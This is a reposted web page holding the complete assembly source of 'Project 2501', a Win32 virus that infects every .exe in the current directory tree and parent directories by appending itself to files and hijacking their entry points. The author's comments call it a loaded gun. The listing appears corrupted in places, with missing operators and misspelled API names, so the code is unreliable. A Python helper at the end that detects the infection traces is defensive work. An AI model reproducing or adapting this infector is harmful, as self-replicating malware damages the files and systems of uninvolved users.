Win32

xiaoxiao2021-03-05  24

Comment *

Name: Project 2501

OS: Win32

Coder: Belial

Heya,

this is my first PE infector. Wow, a great feeling to have finished it.

Credits go out to Lord Julus and Billy Belcebu, because of their Win32 tutorials. Without them, I would never have finished this creation. It took me nearly a year of reading to understand all the important aspects of Win32 assembly.

Greetings go out to Wallo, Raven and the whole virus channel on Undernet.

Also greetings to Billy Boy from Micro$oft. Thanx for your nice virii-paradise OS. But not sooooo many bugs in future, OK?

I tested this virus only under Win98, so I don't know whether it works under WinMe, WinNT or Win95. But I'm sure somebody will try it out.

The virus is a runtime EXE infector. It infects all files in the current dir and all its subdirectories. After this, it makes one dotdot and infects new files and subdirs until it is in C:\ or five dotdots are done. The only payload my virus has is a directory on the desktop named "Project2501". It is created each run. I'm thinking of putting a txtfile in this directory, but I have no real motivation at the moment. A better payload is in progress, and a nice encryption, I hope. If you think this virus may be a bit incomplete (no encryption and no kewl payload) then I have to say:

With releasing this source I release a loaded gun. In the wrong hands, it could be awful for some harmless user. So if I release guns I don't want to release "full-automatic guns". That's for now.

Belial

*

.586

.MODEL FLAT

.DATA

DB 0

DB 'this is the first generation of project2501'

.code

Start:

Call Delta_Setup

Delta_setup:

POP EBP

Sub EBP, Offset Delta_Setup

GET_THOSE_APIS:

MOV EAX, DWORD PTR [ESP]

And Eax, 0FFFF0000h

MOV ECX, 0

Call find_mz_and_pe

Call find_all_apis

Infection_part:

MOV BYTE PTR [EBP DIR_COUNTER], 0

MOV BYTE PTR [EBP AM_I_UP], 0

MOV EAX, DWORD PTR [EBP Image_BASE]

MOV DWORD PTR [EBP Image_BASE2], EAX

MOV EAX, DWORD PTR [EBP OLD_ENTRY_POINT]

MOV DWORD PTR [EBP OLD_ENTRY_POINT2], EAX

Call seek_and_destroy

PayLoad_Part:

Call payload

Reanimation_part:

CMP EBP, 0

JE EXIT_HERE

MOV EAX, DWORD PTR [EBP Image_BASE2]

Add Eax, DWORD PTR [EBP OLD_ENTRY_POINT2]

JMP EAX

EXIT_HERE:

PUSH 0

Call [EBP EXITPROCESS]

FIND_MZ_AND_PE PROC

Add ECX, 1

CMP ECX, 11

JE MZ_NOT_FOND

MOV BX, Word Ptr [EAX]

CMP BX, 'ZM'

JE FIND_THE_PE

Sub Eax, 010000H

JMP FIND_MZ_AND_PE

Find_the_pe:

Mov ESI, EAX

MOV EBX, DWORD PTR [EAX 3CH]

Add Eax, EBX

MOV BX, Word Ptr [EAX]

CMP BX, 'EP'

JNE MZ_NOT_FOND

MOV DWORD PTR [EBP KERNELBASE], ESI

MOV DWORD PTR [EBP KERNELPEHEADER], EAX

RET

MZ_NOT_FOND:

JMP Reanimation_PART

FIND_MZ_AND_PE ENDP

Find_apis proc

POP ESI

POP EAX

MOV DWORD PTR [EBP APINAMEOFFSET], EAX

POP EAX

MOV DWORD PTR [EBP APIENGHT], EAX

POP EAX

MOV DWORD PTR [EBP PUTITTHERE], EAX

PUSH ESI

MOV EAX, DWORD PTR [EBP KERNELPEHEADER]

Mov ESI, DWORD PTR [EAX 78H]

Add ESI, DWORD PTR [EBP KERNELBASE]

Add ESI, 1CH

MOV EAX, DWORD PTR [ESI]

Add Eax, DWORD PTR [EBP KERNELBASE]

MOV DWORD PTR [EBP AdRess_Table_va], EAX

Add ESI, 4

MOV EAX, DWORD PTR [ESI]

Add Eax, DWORD PTR [EBP KERNELBASE]

MOV DWORD PTR [EBP NAME_TABLE_VA], EAX

Add ESI, 4

MOV EAX, DWORD PTR [ESI]

Add Eax, DWORD PTR [EBP KERNELBASE]

MOV DWORD PTR [EBP Ordinal_Table_va], EAX

MOV ESI, DWORD PTR [EBP NAME_TABLE_VA]

MOV DWORD PTR [EBP APICOUNTER], 00000000h

Find_the_name: Push ESI

MOV EAX, DWORD PTR [ESI]

Add Eax, DWORD PTR [EBP KERNELBASE]

Mov ESI, EAX

MOV EDI, DWORD PTR [EBP APINAMEOFFSET]

MOV ECX, 0

Mov Cl, Byte PTR [EBP APIENGHT]

CLD

REP CMPSB

JZ WE_FOUND_IT

POP ESI

Add ESI, 4

Inc DWORD PTR [EBP APICOUNTER]

JMP Find_The_Name

WE_FOUND_IT:

POP ESI; Taken from Billybel

MOV EAX, DWORD PTR [EBP APICOUNTER]

SHL EAX, 1

Add Eax, DWORD PTR [EBP Ordinal_Table_va]

MOV ESI, 0

XCHG Eax, ESI

Lodsw

SHL EAX, 2

Add Eax, DWORD PTR [EBP AdRess_table_va]

Mov ESI, EAX

Lodsd

Add Eax, DWORD PTR [EBP KERNELBASE]

MOV ECX, DWORD PTR [EBP PUTITTHERE]

Mov DWORD PTR [ECX], EAX

RET

Find_apis endp

FIND_ALL_APIS PROC

Lea Eax, [EBP OFFSET EXITPROCESS]

Push EAX

Push DWORD PTR [EBP EXITPROCESSLENGHT]

Lea Eax, [EBP OFFSET _EXITPROCESS]

Push EAX

Call find_apis

Lea Eax, [EBP Offset FindfirstFilea]

Push EAX

Push DWORD PTR [EBP FINDFIRSTFILENGHT]

Lea Eax, [EBP OFFSET _FINDFIRSTFILEA]

Push EAX

Call find_apis

Lea Eax, [EBP OFFSET FINDNEXTFILEA]

Push EAX

Push DWORD PTR [EBP FINDNEXTFILENGHT]

Lea Eax, [EBP Offset _FindNextFilea]

Push EAX

Call find_apis

Lea Eax, [EBP Offset CreateFilea]

Push EAX

Push DWORD PTR [EBP CREATEFILENGHT]

Lea Eax, [EBP OFFSET _CREATEFILEA]

Push EAX

Call find_apis

Lea Eax, [EBP OFFSET CloseHandle]

Push EAX

Push DWORD PTR [EBP CloseHandLelenght]

Lea Eax, [EBP OFFSET _CLOSEHANDLE]

Push EAX

Call find_apis

Lea Eax, [EBP Offset CreateFilemappinga]

Push EAX

Push DWORD PTR [EBP CREATEFILEMAPPINGLENGHT]

Lea Eax, [EBP Offset _CreateFilemappinga]

Push EAX

Call find_apis

Lea Eax, [EBP Offset MapViewOffile]

Push EAX

Push DWORD PTR [EBP MAPVIEWOFFILENGHT]

Lea Eax, [EBP OFFSET _MAPVIEWOFFILE]

Push EAX

Call find_apis

Lea Eax, [EBP Offset UnmapViewOffile]

Push EAX

Push DWORD PTR [EBP UnmapViewOffileLenght]

Lea Eax, [EBP OFFSET _UNMAPVIEWOFFILE]

Push EAX

Call find_apis

Lea Eax, [EBP Offset getFileSize]

Push EAX

Push DWORD PTR [EBP GETFILESIZELENGHT]

Lea Eax, [EBP OFFSET _GETFILESIZE]

Push EAX

Call find_apis

Lea Eax, [EBP Offset SetFilePointer]

Push EAX

Push DWORD PTR [EBP SETFILEPOINTERLENGHT]

Lea Eax, [EBP OFFSET _SETFILEPOINTER]

Push EAX

Call find_apis

Lea Eax, [EBP Offset STENDOFFILE]

Push EAX

Push DWORD PTR [EBP STENDOFFileLenght]

Lea EAX, [EBP Offset _sendoffile]

Push EAX

Call find_apis

Lea Eax, [EBP Offset SetCurrentDirectorya]

Push EAX

Push DWORD PTR [EBP SETCURRENTDIRECTORYLENGHT]

Lea Eax, [EBP Offset _SetCurrentDirectorya]

Push EAX

Call find_apis

Lea Eax, [EBP Offset CreatedIRectorya]

Push EAX

Push DWORD PTR [EBP CREATEDIRECTORYENGHT]

Lea Eax, [EBP OFFSET _CREATEDIRECTORYA]

Push EAX

Call find_apis

RET

FIND_ALL_APIS ENDP

Seek_and_destroy Proc

Find_first_file:

MOV BYTE PTR [EBP Infection_Flag], 0

Lea Eax, [EBP Offset FindfileData]

Push EAX

Lea Eax, [EBP OFFSET TOSEARCH]

Push EAX

Call [EBP FINDFIRSTFILEA]

MOV DWORD PTR [EBP FINDFILEHANDLE], EAX

INC EAX

JZ NO_FILES_LEFT

JMP Open_THE_FILE

Find_next_file:

MOV BYTE PTR [EBP Infection_Flag], 0

Lea Eax, [EBP Offset FindfileData]

Push EAX

Push DWORD PTR [EBP FINDFILEHANDLE]

Call [EBP FINDNEXTFILEA]

Test Eax, EAX

JZ NO_FILES_LEFT

Open_THE_FILE:

PUSH 0

PUSH 0

Push 3

PUSH 0

Push 1

PUSH 80000000H 40000000H

Lea Eax, [EBP Offset FindfileData.cfileName]

Push Eax

Call [EBP CREATEFILEA]

CMP EAX, 0FFFFFFFH

JE FIND_NEXT_FILE

Mov DWORD PTR [EBP FILEHANDLE], EAX

PUSH 0

Push DWORD PTR [EBP FILEHANDLE]

Call [EBP GETFILESIZE]

Calculate_new_size:

MOV DWORD PTR [EBP Thefilesize], EAX

Add Eax, Virus_END-START

Add Eax, 100

Now_make_file_mapping:

PUSH 0

Push EAX

PUSH 0

Push 4

PUSH 0

Push DWORD PTR [EBP FILEHANDLE]

Call [EBP CREATEFILEMAPPINGA]

MOV DWORD PTR [EBP FilemAppingHandle], EAX

MOV EAX, DWORD PTR [EBP ThefileSize]

Add Eax, Virus_END-START

Add Eax, 100

Push EAX

PUSH 0

PUSH 0

Push 2

Push DWORD PTR [EBP FileMappingHandle]

Call [EBP MAPVIEWOFFILE]

MOV DWORD PTR [EBP MAPADRESS], EAX

CMP Word PTR [EAX], 'ZM'

JNE Search_another

MOV EBX, 0

MOV BX, Word PTR [EAX 3CH]

CMP Word PTR [EAX EBX], 'EP'

JNE Search_another

CMP Word PTR [EAX 38H], 'AA'

JE Search_another

Call infect_file

Search_another:

CMP BYTE PTR [EBP Infection_Flag], 1

JE close_normal

Call close_not_normal

Close_normal:

Push DWORD PTR [EBP MAPADRESS]

Call [EBP UnmapViewOffile]

Push DWORD PTR [EBP FileMappingHandle]

Call [EBP CloseHandle]

Push DWORD PTR [EBP FILEHANDLE]

Call [EBP CloseHandle]

JMP Find_Next_File

NO_FILES_LEFT:

CMP BYTE PTR [EBP AM_I_UP], 1

JE Go_Down

Lea Eax, [EBP Offset FindfileData]

Push EAX

Lea Eax, [EBP Offset AllFiles]

Push EAX

Call [EBP FINDFIRSTFILEA]

MOV DWORD PTR [EBP DIR_Search_Handle], EAX

INC EAX

JZ NO_DIRS_LEFT

CMP BYTE PTR [EBP FINDFILEDATA.CFILENAME], '.'

JE FIND_NEXT_DIR

JMP IS_IT_DIR

Find_next_dir:

Lea Eax, [EBP Offset FindfileData]

Push EAX

Push DWORD PTR [EBP DIR_SEARCH_HANDLE]

CALL [EBP FINDNEXTFILEA]

Test Eax, EAX

JZ NO_DIRS_LEFT

CMP BYTE PTR [EBP FINDFILEDATA.CFILENAME], '.'

JE FIND_NEXT_DIR

IS_IT_DIR:

CMP DWORD PTR [EBP FINDFILEDATA.DWFILEATTRIBUTES], 10H

JE IT_IS_DIR

JMP Find_Next_Dir

IT_IS_DIR:

Lea Eax, [EBP FINDFILEDATA.CFILENAME]

Push EAX

Call [EBP SETCURRENTDIRECTORYA]

MOV BYTE PTR [EBP AM_I_UP], 1

JMP Find_First_File

NO_DIRS_LEFT:

Lea Eax, [EBP OFFSET DOTDOT]

Push EAX

Call [EBP SETCURRENTDIRECTORYA]

Add Byte PTR [EBP DIR_COUNTER], 1

CMP BYTE PTR [EBP DIR_COUNTER], 5

JE all_for_now

MOV BYTE PTR [EBP AM_I_UP], 0

JMP Find_First_File

ALL_FOR_NOW:

RET

Go_down:

Lea Eax, [EBP OFFSET DOTDOT]

Push EAX

Call [EBP SETCURRENTDIRECTORYA]

MOV BYTE PTR [EBP AM_I_UP], 0

JMP Find_Next_Dir

Seek_and_destroy ENDP

CLOSE_NOT_NORMAL PROC

PUSH 0

PUSH 0

Push DWORD PTR [EBP ThefileSize]

Push DWORD PTR [EBP FILEHANDLE]

Call [EBP SETFILEPOINTER]

Push DWORD PTR [EBP FILEHANDLE]

Call [EBP STENDOFFILE]

RET

CLOSE_NOT_NORMAL ENDP

Infect_file proc

MOV BYTE PTR [EBP Infection_Flag], 1

MOV EAX, DWORD PTR [EBP MAPADRESS]

Mov Word PTR [EAX 38H], 'AA'

Mov EDI, 0

MOV DI, Word PTR [EAX 3CH]

Add Eax, EDI; Peheader At Eax

MOV DWORD PTR [EBP Peheader_offset], EAX

Mov ESI, DWORD PTR [EAX 28H]

MOV DWORD PTR [EBP OLD_ENTRY_POINT], ESI

MOV ESI, DWORD PTR [EAX 3CH]

MOV DWORD PTR [EBP FILE_ALLIGN], ESI

MOV ESI, DWORD PTR [EAX 34H]

MOV DWORD PTR [EBP Image_BASE], ESI

Mov ESI, EAX

GO_TO_LAST_SECTION:

MOV EBX, DWORD PTR [ESI 74H]

SHL EBX, 3

MOV EAX, 0

MOV AX, Word PTR [ESI 6H]

Dec EAX

MOV ECX, 28h

Mul ECX

Add ESI, 78H

Add ESI, EBX

Add ESI, ESI

Modify_it:

OR DWORD PTR [ESI 24H], 00000020H

OR DWORD PTR [ESI 24h], 20000000H

OR DWORD PTR [ESI 24H], 80000000H

Mov Eax, [ESI 10h]; Code Taken from Lord Julus (IM NOT Good In Math)

MOV DWORD PTR [EBP OLD_RAW_SIZE], EAX

Add DWORD PTR [ESI 8H], (Offset Virus_end - Offset Start)

Mov Eax, DWORD PTR [ESI 8h]

MOV ECX, DWORD PTR [EBP FILE_ALLIGN]

Div ECX

MOV ECX, DWORD PTR [EBP FILE_ALLIGN]

SUB ECX, EDX

Mov DWORD PTR [ESI 10H], EAX

Mov Eax, DWORD PTR [ESI 8h]

Add Eax, DWORD PTR [ESI 10h]

Mov DWORD PTR [ESI 10H], EAX

MOV DWORD PTR [EBP New_RAW_SIZE], EAX

MOV EAX, DWORD PTR [ESI 0CH]

Add Eax, DWORD PTR [ESI 8H]

SUB EAX, (Offset Virus_end-Offset Start)

MOV DWORD PTR [EBP New_ENTRY], EAX

MOV EAX, DWORD PTR [EBP OLD_RAW_SIZE]

MOV EBX, DWORD PTR [EBP NEW_RAW_SIZE]

SUB EBX, EAX

MOV DWORD PTR [EBP Inc_RAW_SIZE], EBX

MOV EAX, DWORD PTR [ESI 14H]

Add Eax, DWORD PTR [EBP NEW_RAW_SIZE]

MOV DWORD PTR [EBP New_FILE_SIZE], EAX

MOV EAX, DWORD PTR [ESI 14H]

Add Eax, DWORD PTR [ESI 8]

SUB EAX, (Offset Virus_end-Offset Start)

Add Eax, DWORD PTR [EBP MAPADRESS]

Mov Edi, EAX

Lea ESI, [EBP OFFSET START]

MOV ECX, (Offset Virus_end-Offset Start)

REP MOVSB

MOV ESI, DWORD PTR [EBP Peheader_offset]

MOV EAX, DWORD PTR [EBP New_ENTRY]

Mov DWORD PTR [ESI 28H], EAX

MOV EAX, DWORD PTR [EBP Inc_RAW_SIZE]

Add DWORD PTR [ESI 50H], EAX

RET

Infect_file endp

PayLoad Proc

PUSH 0

Lea Eax, [EBP OFFSET DIR_NAME]

Push EAX

Call [EBP CREATEDIRECTORYA]

RET

PayLoad Endp

New_file_size DD 0

Inc_raw_size DD 0

New_ENTRY DD 0

NEW_RAW_SIZE DD 0

Old_raw_size dd 0

FILE_ALLIGN DD 0

PEHEADER_OFFSET DD 0

Image_base dd 0

OLD_ENTRY_POINT DD 0

Image_base2 DD 0

Old_entry_point2 dd 0

KernelBase DD 0

KernelpeHeader DD 0

AdRess_table_va DD 0

Name_TABLE_VA DD 0

Ordinal_table_va DD 0

APICOUNTER DD 00000000H

ApinameOffset DD 0

Apilenght DD 0

Putitthere DD 0

EXITPROCESS DD 00000000H

_ExitProcess DB 'EXIXTPROCESS', 0

EXITPROCESSLENGHT DD 12

Findfirstfilea DD 00000000H

_FindfirstFilea DB 'Findfirstfilea', 0

FindfirstFileLenght DD 15

FINDNEXTFILEA DD 00000000H

_FindNextFilea DB 'FindNextFilea', 0

FindNextFileLenght DD 14

CreateFilea DD 00000000H

_CreateFilea DB 'Createfilea', 0

CreateFileLenght DD 12

CloseHandle DD 0000000000h

_CloseHandle DB 'CloseHandle', 0

CloseHandLelenght DD 12

CreateFilemappinga DD 00000000H

_CreateFileMappinga DB 'CreateFilemappinga', 0

CreateFilemappingLENGHT DD 19

MapViewOffile DD 00000000H

_MapViewoffile DB 'MapViewOffile', 0

MapViewOffileLenght DB 14

UnmapViewoffile DD 00000000H

_UnmapViewoffile db 'unmapviewoffile', 0

UnmapViewOffileLenght DD 16

GetFileSize DD 00000000H

_Getfilesize DB 'getFileSize', 0

GetFileSizeLenght DD 12

STENDOFFILE DD 00000000H

_SETENDOFFILE DB 'STENDOFFILE', 0

STENDOFFILENGHT DD 13

SetFilePointer DD 00000000h

_SetFilePointer DB 'SetFilePointer', 0

SetFilePointerLENGHT DD 15

SetCurrentDirectorya DD 0

_SetcurrentDirectorya DB 'setCurrentDirectorya', 0

SetCurrentDirectoryLENGHT DD 21

CreatedIRectorya DD 0

_CreatedDirectorya DB 'CreateDirectorya', 0

CreatedIRectoryLENGHT DD 17

Mapadress DD 0

Infection_flag db 0

Tosearch DB '* .exe', 0

FindfileHandle DD 0

FileHandle DD 0

ThefileSize DD 0

FilemappingHandle DD 0

Credit DB 'Project2501 WAS Coded by Belial'

DB 'Greetings to a Nice Girl from Scandinavia'

Dotdot DB '..', 0

Allfiles db '*. *', 0

Dir_search_handle DD 0

AM_I_UP DB 0

DIR_NAME DB 'C: / Windows / Desktop / Project2501', 0

Dir_counter db 0

MAX_PATH EQU 260

Filetime Struct

DWLOWDATETIME DWORD?

DWHIGHDATETIME DWORD?

Filetime Ends

Win32_find_data struct

DWFileAttributes DWORD?

FTCREATIONTIME FileTime <>

FTLASTACCESSTIME FileTime <>

FTLASTWRITIME FileTime <>

NFILESIZEHIGH DWORD?

NFILESZELOW DWORD?

DWRESERVED0 DWORD?

DWRESERVED1 DWORD?

CFILENAME BYTE MAX_PATH DUP (?)

Calternate Byte 0Eh DUP (?)

ENDS

FindFileData Win32_Find_Data <>

Virus_end:

End Start
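A defender-side check for the traces this infector leaves in a host file, added here as an example and not part of Belial's source: the 'AA' word stamped at DOS-header offset 38h as its reinfection marker, the entry point moved into the last section, and that section flagged both writable and executable. The helper names and the constructed minimal PE images are my own assumptions; the header offsets are the standard PE32 layout.

```python
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def pe_infection_indicators(data: bytes) -> dict:
    """Hypothetical helper: parse DOS/PE headers by hand and report the three
    traits an appended-last-section infector like the one above leaves behind."""
    ind = {"marker": False, "ep_in_last_section": False, "last_section_wx": False}
    if len(data) < 0x40 or data[:2] != b"MZ":
        return ind
    # The listing writes the word 'AA' to DOS-header offset 0x38 and skips files that carry it.
    ind["marker"] = data[0x38:0x3A] == b"AA"
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return ind
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 0x14)[0]
    entry_rva = struct.unpack_from("<I", data, e_lfanew + 0x28)[0]  # AddressOfEntryPoint
    if num_sections == 0:
        return ind
    # Section table follows the optional header; each entry is 40 bytes.
    last = e_lfanew + 0x18 + opt_size + 40 * (num_sections - 1)
    vsize, vaddr = struct.unpack_from("<II", data, last + 8)
    chars = struct.unpack_from("<I", data, last + 36)[0]
    ind["ep_in_last_section"] = vaddr <= entry_rva < vaddr + max(vsize, 1)
    ind["last_section_wx"] = bool(chars & IMAGE_SCN_MEM_EXECUTE) and bool(chars & IMAGE_SCN_MEM_WRITE)
    return ind


def build_sample(marker: bool, entry_rva: int, last_chars: int) -> bytes:
    """Constructed headers-only PE32 image with two sections, for testing the check offline."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    if marker:
        dos[0x38:0x3A] = b"AA"
    struct.pack_into("<I", dos, 0x3C, 0x40)              # e_lfanew
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)           # AddressOfEntryPoint
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, len(opt), 0x102)

    def sec(name, vsize, vaddr, chars):
        return struct.pack("<8sIIIIIIHHI", name, vsize, vaddr, vsize, 0x400, 0, 0, 0, 0, chars)

    text = sec(b".text", 0x1000, 0x1000, 0x60000020)     # code, read, execute
    data = sec(b".data", 0x1000, 0x2000, last_chars)
    return bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt) + text + data
```

On a real sample the three indicators together are a strong hint of this family of infector; each alone (packers also set write+execute on their last section) is only a lead.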

Please credit the original source when reposting: https://www.9cbs.com/read-37084.html
